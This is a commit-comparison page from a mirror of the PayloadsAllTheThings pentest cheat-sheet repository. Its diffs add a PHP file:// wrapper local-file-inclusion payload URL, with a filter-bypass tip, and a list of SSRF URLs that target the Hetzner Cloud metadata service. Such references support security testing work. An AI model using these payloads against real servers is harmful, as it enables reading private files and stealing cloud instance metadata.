mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 07:36:09 +02:00
Compare commits
6 Commits
6145d1a987
...
23541a1a78
Author | SHA1 | Date | |
---|---|---|---|
n3rada | 23541a1a78 | ||
Swissky | 293723d49d | ||
bsysop | dc461f170e | ||
Swissky | 9571306b9f | ||
bsysop | 3c9fdec3da | ||
n3rada | d658aa026a |
|
@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
|
|||
|
||||
## LFI / RFI using wrappers
|
||||
|
||||
### Wrapper file://
|
||||
It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
|
||||
|
||||
```shell
|
||||
http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
|
||||
```
|
||||
Note that using `localhost` above bypasses `file:///` filtering.
|
||||
|
||||
### Wrapper php://filter
|
||||
|
||||
The part "`php://filter`" is case insensitive
|
||||
|
@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
|||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
|
|
|
@ -52,6 +52,7 @@
|
|||
* [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
|
||||
* [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
|
||||
* [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
|
||||
* [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud)
|
||||
* [SSRF URL for Docker](#ssrf-url-for-docker)
|
||||
* [SSRF URL for Rancher](#ssrf-url-for-rancher)
|
||||
|
||||
|
@ -805,6 +806,18 @@ http://100.100.100.200/latest/meta-data/instance-id
|
|||
http://100.100.100.200/latest/meta-data/image-id
|
||||
```
|
||||
|
||||
### SSRF URL for Hetzner Cloud
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/hetzner/v1/metadata
|
||||
http://169.254.169.254/hetzner/v1/metadata/hostname
|
||||
http://169.254.169.254/hetzner/v1/metadata/instance-id
|
||||
http://169.254.169.254/hetzner/v1/metadata/public-ipv4
|
||||
http://169.254.169.254/hetzner/v1/metadata/private-networks
|
||||
http://169.254.169.254/hetzner/v1/metadata/availability-zone
|
||||
http://169.254.169.254/hetzner/v1/metadata/region
|
||||
```
|
||||
|
||||
### SSRF URL for Kubernetes ETCD
|
||||
|
||||
Can contain API keys and internal ip and ports
|
||||
|
|
Loading…
Reference in New Issue